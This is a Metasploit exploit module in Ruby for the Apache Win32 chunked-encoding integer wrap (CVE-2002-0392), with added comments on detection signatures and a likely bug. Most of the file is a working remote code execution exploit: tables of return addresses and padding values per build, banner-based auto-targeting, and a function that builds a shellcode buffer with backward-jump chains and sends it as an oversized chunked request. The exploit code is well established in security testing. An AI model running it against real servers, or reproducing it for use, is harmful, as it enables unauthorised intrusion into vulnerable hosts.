##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Apache Win32 chunked-encoding exploit module (CVE-2002-0392).
#
# The module decides everything from the HTTP Server banner: `check` grades the
# host by banner, `auto_target` turns the banner into a list of target-table
# entries, and `exploit_target` sends one chunked request per padding value.
# On the wire the request is recognisable by its upper-case
# "Transfer-Encoding: CHUNKED" header and the oversized "FFFFFFF0" chunk-size
# line (see exploit_target), which is the observable signature for detection.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Banner pattern handed to the HttpClient mixin's http_fingerprint;
  # presumably limits fingerprinting to servers identifying as Apache --
  # confirm against the mixin, its effect is not visible in this file.
  HttpFingerprint = { :pattern => [ /Apache/ ] }

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata: references, payload constraints and the target
  # table. The order of 'Targets' is load-bearing: auto_target picks entries by
  # numeric index (targets[1] .. targets[11]) and exploit treats index 0 as the
  # auto/bruteforce mode, so inserting or reordering entries silently changes
  # which build each banner maps to.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apache Win32 Chunked Encoding',
      'Description'    => %q{
        This module exploits the chunked transfer integer wrap
        vulnerability in Apache version 1.2.x to 1.3.24. This
        particular module has been tested with all versions of the
        official Win32 build between 1.3.9 and 1.3.24. Additionally,
        it should work against most co-branded and bundled versions
        of Apache (Oracle 8i, 9i, IBM HTTPD, etc).

        You will need to use the Check() functionality to determine
        the exact target version prior to launching the exploit. The
        version of Apache bundled with Oracle 8.1.7 will not
        automatically restart, so if you use the wrong target value,
        the server will crash.
      },
      'Author'         => [ 'hdm', 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2002-0392' ],
          [ 'OSVDB', '838'],
          [ 'BID', '5033' ]
        ],
      'Privileged'     => true,
      'Platform'       => 'win',
      # Constraints handed to the payload encoder; each target's 'Pad' list
      # below is consumed by exploit_target, 'Ret' by target.ret.
      'Payload'        =>
        {
          'Space'    => 987,
          'BadChars' => "\x00\x2b\x26\x3d\x25\x0a\x0d\x20",
          'MinNops'  => 200,
          'Prepend'  => "\x81\xc4\xff\xef\xff\xff\x44",

        },
      'Targets'        =>
        [
          # Index 0: no Ret/Pad of its own; exploit delegates to auto_target.
          [ 'Windows Generic Bruteforce', {} ],

          # Official Apache.org win32 builds
          [ 'Apache.org Build 1.3.9->1.3.19',
            {
              'Ret' => 0x00401151,
              'Pad' => [6,2,0,4,1,3,5,7]
            }
          ],
          [ 'Apache.org Build 1.3.22->1.3.24',
            {
              'Ret' => 0x00401141,
              'Pad' => [2,6,0,4,1,3,5,7]
            }
          ],
          [ 'Apache.org Build 1.3.19->1.3.24',
            {
              'Ret' => 0x6ff6548d,
              'Pad' => [2,6,0,4,1,3,5,7]
            }
          ],
          [ 'Apache.org Build 1.3.22',
            {
              'Ret' => 0x6ff762ac,
              'Pad' => [2,6,0,4,1,3,5,7]
            }
          ],

          # Return to Win9xConHook.dll via call ebx
          [ 'Apache.org Build 1.3.17->1.3.24 (Windows 2000)',
            {
              'Ret' => 0x1c0f13e5,
              'Pad' => [2,6,0,4,1,3,5,7]
            }
          ],

          # Return to Win9xConHook.dll via call esi
          [ 'Apache.org Build 1.3.17->1.3.24 (Windows NT)',
            {
              'Ret' => 0x1c0f1033,
              'Pad' => [2,6,0,4,1,3,5,7]
            }
          ],

          # Interesting return to PEB trick for Windows 2003 systems...
          [ 'Windows 2003 English SP0',
            {
              'Ret' => 0x7ffc0638,
              'Pad' => [2,6,5,4,1,3,0,7]
            }
          ],

          # Pop/Pop/Return on Windows 2000
          [ 'Windows 2000 English',
            {
              'Ret' => 0x75022ac4,
              'Pad' => [2,6,5,4,1,3,0,7]
            }
          ],

          # Oracle HTTPD: [ 8.1.7 ] (one shot)
          # Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
          # OpenSSL/0.9.5a mod_perl/1.24
          # Single 'Pad' value because this build does not restart after a
          # failed attempt (see Description).
          [ 'Oracle 8.1.7 Apache 1.3.12',
            {
              'Ret' => 0x1d84d42c,
              'Pad' => [7]
            }
          ],

          # Oracle HTTPD: [ 9.1.0 ] (multiple shots)
          # Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4
          # OpenSSL/0.9.5a mod_perl/1.24
          [ 'Oracle 9.1.0 Apache 1.3.12',
            {
              'Ret' => 0x10016061,
              'Pad' => [5,6,0,4,1,3,2,7]
            }
          ],

          # Oracle HTTPD: [ 9.2.0 ] (multiple shots)
          # Oracle HTTP Server Powered by Apache/1.3.22 (Win32)
          # mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b
          # mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25
          [ 'Oracle 9.2.0 Apache 1.3.22',
            {
              'Ret' => 0x6ff6427a,
              'Pad' => [5,6,0,4,1,3,2,7]
            }
          ],

          # Generic debugging targets
          # Skipped by exploit when auto-targeting (name matches /Debug/).
          [ 'Debugging Target',
            {
              'Ret' => 0xcafebabe,
              'Pad' => [0,1,2,3,4,5,6,7]
            }
          ]
        ],
      'DisclosureDate' => '2002-06-19',
      'DefaultTarget'  => 0))
  end

  # Banner-only vulnerability check.
  #
  # Returns Exploit::CheckCode::Unknown when the server does not answer,
  # Safe when the Server header names an IBM HTTP Server build that carries
  # the backported fix or matches none of the known patterns, and Appears
  # otherwise. Because the verdict rests solely on the Server header, a banner
  # that hides its version (e.g. a restrictive ServerTokens setting) falls to
  # the else branch and is reported Safe whether or not the build is patched.
  def check
    response = send_request_raw({'uri' => '/'}, 5)
    if response.nil?
      vprint_status("No response to request")
      return Exploit::CheckCode::Unknown
    end

    http_fingerprint({ :response => response }) # Custom Server header matching

    code = Exploit::CheckCode::Appears

    case response['Server']
    when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
      vprint_status("This looks like an Oracle 8.1.7 Apache service (one-shot only)")
    when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
      vprint_status("This looks like an Oracle 9.1.0 Apache service (multiple tries allowed)")
    when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
      vprint_status("This looks like an Oracle 9.2.0 Apache service (multiple tries allowed)")
    when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
      vprint_status("IBM backported the patch, this system is not vulnerable")
      code = Exploit::CheckCode::Safe
    # Generic Apache banner in the affected ranges (1.0.x-1.3.25 and
    # 2.0.0-2.0.38 as written in the regex). The empty body is intentional:
    # it keeps `code` at Appears and prevents the else branch from running.
    when /Apache(-AdvancedExtranetServer)?\/(1\.([0-2]\.[0-9]|3\.([0-9][^0-9]|[0-1][0-9]|2[0-5]))|2\.0.([0-9][^0-9]|[0-2][0-9]|3[0-8]))/
    else
      code = Exploit::CheckCode::Safe
    end

    vprint_status("Server: #{response['Server']}")

    return code
  end

  # Builds the ordered list of target-table entries to try in bruteforce mode,
  # derived from the Server banner. Exact Oracle banners map to a single entry;
  # an Apache/1.3.N banner maps to every entry whose build range covers N, with
  # the Win32-only entries appended when the banner contains "Win32".
  # Returns an Array of target entries (empty when nothing matched).
  def auto_target
    response = send_request_raw({'uri' => '/'}, 5)
    if response.nil?
      print_error("No response to request")
      # NOTE(review): targets_to_try is first assigned further down, so at this
      # point Ruby parses the name as a method call and (unless the mixins
      # define such a method) this raises NameError instead of returning an
      # empty list; `return []` is what the caller in exploit expects.
      return targets_to_try
    end

    http_fingerprint({ :response => response }) # Custom Server header matching / automatic target selection

    targets_to_try = []
    server_hdr = response['Server']
    print_status("Server: #{server_hdr}")

    case server_hdr
    when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
      targets_to_try.push(targets[9])

    when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
      targets_to_try.push(targets[10])

    when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
      targets_to_try.push(targets[11])

    when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
      # fall through

    else
      # check for apache version ranges
      # `or` short-circuits, so $1 holds the capture of whichever alternative
      # matched first.
      if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
        version = $1

        #print_status("Apache version: #{version}")
        # Only a full major.minor.rev banner is mapped; anything shorter or
        # longer is left unmatched.
        ver = version.split('.')
        if (ver.length == 3)
          major = ver[0].to_i
          minor = ver[1].to_i
          rev = ver[2].to_i
          if (major == 1 and minor == 3)
            # Ranges mirror the build ranges in the target names above.
            targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
            targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
            targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
            targets_to_try.push(targets[4]) if (rev == 22)

            # Add the remaining targets, regardless of quality...
            if (server_hdr =~ /Win32/)
              # targets 5, 6, 7, 8
              if (rev >= 17 and rev <= 24)
                targets_to_try.push(targets[5])
                targets_to_try.push(targets[6])
              end
              targets_to_try.push(targets[7])
              targets_to_try.push(targets[8])
            end
          end
          # Version 1.0 - 1.2, Fall through...
        end
        # ServerTokens setting isn't giving up enough information ... Might need to try?
      end
      # Not Apache? Fall through...
    end

    targets_to_try
  end

  #
  # If auto, ask the auto_target function for a list of
  # targets to try...
  #
  # If not auto, just try the selected target.
  #
  # Target index 0 is the 'Windows Generic Bruteforce' entry. In that mode
  # every candidate returned by auto_target is attempted in order, except the
  # 'Debugging Target' whose name matches /Debug/.
  #
  def exploit
    if target_index == 0
      targs = auto_target
      print_status("Auto-targeting returned #{targs.length} candidates...")
      targs.each_with_index { |targ, idx| # idx is unused
        # Never try the debug target automatically :)
        next if targ.name =~ /Debug/
        exploit_target(targ)
      }
    else
      exploit_target(target)
    end
  end

  # Sends one chunked request per padding value in target['Pad'], using
  # target.ret as the return address, and invokes `handler` after each send so
  # a session opened by any single attempt is picked up.
  #
  # target - a target-table entry (Msf::Module::Target) with 'Ret' and 'Pad'.
  def exploit_target(target)
    target['Pad'].each { |pad|
      pattern =
        rand_text_alphanumeric(3936) +
        payload.encoded +
        make_nops(6) + "\xe9" + [-900].pack('V') + "pP" +
        rand_text_alphanumeric(pad)

      # Move slightly further back to allow padding changes
      pattern +=
        "\xeb\xf0\xde\xad" +
        [target.ret].pack('V')

      # Create a chain of return addresses and reverse jumps
      254.times { |x| # x is unused
        pattern +=
          "\xeb\xf6\xbe\xef" +
          [target.ret].pack('V')
      }

      # Even out the request length based on the padding value
      # This is required to reliably hit the return address offset
      pattern += rand_text_alphanumeric(8 - pad)

      #
      # Regardless of what return we hit, execution jumps backwards to the shellcode:
      #                                  _______________ _______________ ___________
      #   _________ _____________       | ________     | | ______      | | ______
      #   v        |  v          |      v v      |     | v v     |     | v v     |
      # [shellcode] [jmp -949] [pad] [jmp -16] [ret] [jmp -8] [ret] [jmp -8] [ret]
      #

      print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")

      # Build the request
      # The body's first token is the chunk-size line; the oversized hex value
      # is the trigger for the integer wrap named in the Description, and the
      # upper-case header value plus this token are what an IDS rule can key on.
      send_request_raw({
        'uri'     => '/',
        'headers' =>
          {
            'Transfer-Encoding' => "CHUNKED"
          },
        'data'    => "FFFFFFF0 " + pattern,
      }, 2)

      # Check the handler
      handler
    }
  end
end